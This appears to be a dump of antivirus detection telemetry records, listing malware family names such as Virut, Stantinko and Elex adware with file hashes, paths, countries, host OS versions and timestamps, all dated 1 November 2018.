  Row(detection=Row(filename='avscan-20181101-212641-06e72506', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212641-06E72506', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212717-0c33c2cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212717-0C33C2CB', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212707-0ab64ee9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212707-0AB64EE9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212650-0841cfb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212650-0841CFB2', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213247-3c1869a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213247-3C1869A5', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213318-40a262c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213318-40A262C8', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213310-3f67b535', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213310-3F67B535', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212927-1f0d979a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212927-1F0D979A', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212116-d7b92131', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212116-D7B92131', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212059-d552e66b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212059-D552E66B', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212948-2232acc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212948-2232ACC6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:30:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212201-de40cf5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212201-DE40CF5B', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212206-df0f4a72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212206-DF0F4A72', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212020-cfa42ac1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212020-CFA42AC1', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212215-e05d6cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212215-E05D6CCE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212218-e0cbe9eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212218-E0CBE9EB', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212029-d0f94d13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212029-D0F94D13', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212942-213b18d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212942-213B18D6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-12.available\\Avira\\BE958E6543436DFB4FBF57F99545CA02CF178D9E656C0443DA27ED7178F00D66', filesize=384000, name='W32/Sivis.A.#M1.#R1'), hash='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-12.available\\Avira\\BE958E6543436DFB4FBF57F99545CA02CF178D9E656C0443DA27ED7178F00D66', filesize=384000, name='W32/Sivis.A.#M1.#R1'), hash='be958e6543436dfb4fbf57f99545ca02cf178d9e656c0443da27ed7178f00d66', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be9ce919164d833c2690a8db378dd49422ed4a621524407fcf853da3992e59bd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BE9CE919164D833C2690A8DB378DD49422ED4A621524407FCF853DA3992E59BD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='be9ce919164d833c2690a8db378dd49422ed4a621524407fcf853da3992e59bd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091226-8ea28f58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c0bde03\\AVSCAN-20181101-090119-0AF3D2E8\\AVSCAN-20181101-091226-8EA28F58', filesize=7360000, name='TR/Crypt.ZPACK.Gen7.#M1.#R1'), hash='bef09a9e5bbfd93946aa5af7beccd1de57a27c2022b40bcfc459cf350c20a2c9', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:12:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='bf213ca462e6044e538f444a9351ccd17310c8f36909be2987f9ba27b1521180', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165348-128afe24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165348-128AFE24', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:53:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165307-0a7ed7a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165307-0A7ED7A4', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:53:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164147-842e8eeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-164147-842E8EEB', filesize=192000, name='Adware/Elex.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hopinst.exe', filepath='C:\\Program Files (x86)\\interhpx_00000001\\HopInst.exe', filesize=192000, name='Adware/ELEX.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kwk.exe', filepath='\\\\?\\G:\\Bibliothèques\\Visual Novel Japonais\\Kare wa Kanojo\\kwk.exe', filesize=128000, name='TR/Crypt.ZPACK.Gen.#M300.#R2504'), hash='bf4c810d47d7559e3b150649d8ab0672d9e8971c4f4d603c161efcd2692b4fb2', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odin3-v3.10.6.exe', filepath='\\\\?\\F:\\New folder (9)\\Compressed\\CF-Auto-Root-j5lte-j5ltedx-smj500g\\Odin3-v3.10.6.exe', filesize=2304000, name='W32/Virut.Gen.#M1.#R1'), hash='bf58a04df5dde2d8b4590378205b23b313c940a1b53ec478f8b7e227531c1d90', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:59:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odin3-v3.10.6.exe', filepath='F:\\New folder (9)\\Compressed\\CF-Auto-Root-j5lte-j5ltedx-smj500g\\Odin3-v3.10.6.exe', filesize=2304000, name='W32/Virut.Gen.#M1.#R1'), hash='bf58a04df5dde2d8b4590378205b23b313c940a1b53ec478f8b7e227531c1d90', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:57:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bf770e11dae387e600db125ed0cbdb935fe00223066b586dce323f746c5182f5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BF770E11DAE387E600DB125ED0CBDB935FE00223066B586DCE323F746C5182F5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bf770e11dae387e600db125ed0cbdb935fe00223066b586dce323f746c5182f5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered rofom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered rofom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='bfc751f56a3d199242f8515475e1705643b8dcd181ca5d4b743dcc7c50ffa4f9', metadata=Row(cmdline='\\\\\\/Q \\\\\\/W', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=None, timestamp='2018-11-01T00:14:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02090a7376a36a814cb0ae174dc9e13182471810320ea47edde1ad03990abf7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C02090A7376A36A814CB0AE174DC9E13182471810320EA47EDDE1AD03990ABF7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='c02090a7376a36a814cb0ae174dc9e13182471810320ea47edde1ad03990abf7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02b87b42fe667865584486dbbcf1d4019c4b859c9193fd4fcceb96ad3ce2b21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C02B87B42FE667865584486DBBCF1D4019C4B859C9193FD4FCCEB96AD3CE2B21', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c02b87b42fe667865584486dbbcf1d4019c4b859c9193fd4fcceb96ad3ce2b21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02cbb0d0d2bfed2ffcaafe72195fa681811b2438ed8da8c998f4618ecdd419e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\C02CBB0D0D2BFED2FFCAAFE72195FA681811B2438ED8DA8C998F4618ECDD419E', filesize=832000, name='TR/ATRAPS.Gen2.#M300.#R100632'), hash='c02cbb0d0d2bfed2ffcaafe72195fa681811b2438ed8da8c998f4618ecdd419e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:05:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191054-2c3a20a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191054-2C3A20A5', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rarrepairtool.exe', filepath='K:\\HBCD\\Programs\\RARREPAIRTOOL.EXE', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c065a55abfd0f3bf7e8ab8c5b5c2538fe8c921e23e8c055295af1bdbd282338c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-11.available\\Avira\\C065A55ABFD0F3BF7E8AB8C5B5C2538FE8C921E23E8C055295AF1BDBD282338C', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='c065a55abfd0f3bf7e8ab8c5b5c2538fe8c921e23e8c055295af1bdbd282338c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:53:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:41:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:19:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:20:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c0e83ca936d5180d3cc27144ce1469e9b8dceeed062081236663d5d3f80cb8b1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashplayerinstaller.exe', filepath='D:\\Backups\\Contmac\\drive\\Fiscal_Contmac\\OUTROS\\SysWOW64\\FlashPlayerInstaller.exe', filesize=18176000, name='W32/Stanit.#M1.#R1'), hash='c1d475681282cd4f133cf5ac615ad63c7293bbbd22d7407a79e1430f82355560', metadata=Row(cmdline='\\\\\\\\\\\\\\\\CONTPARTNER-BKP\\\\\\\\BKP_Completo\\\\\\\\ D:\\\\\\\\Backups\\\\\\\\ \\\\\\/MIR \\\\\\/R:2 \\\\\\/W:2', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Robocopy.exe', parentsize=98816, timestamp='2018-11-01T16:30:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jkh.open.info.tariff.warm план 2011.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\Стандарты раскрытия информации\\план\\JKH.OPEN.INFO.TARIFF.WARM план 2011.xls', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='c1f266ea1c4eb0889ef1bb5e36c55cbce32dbe6264319f7eb6245f05cb600f5e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:35:02Z'), dt=datetime.date(2018, 11, 1)),
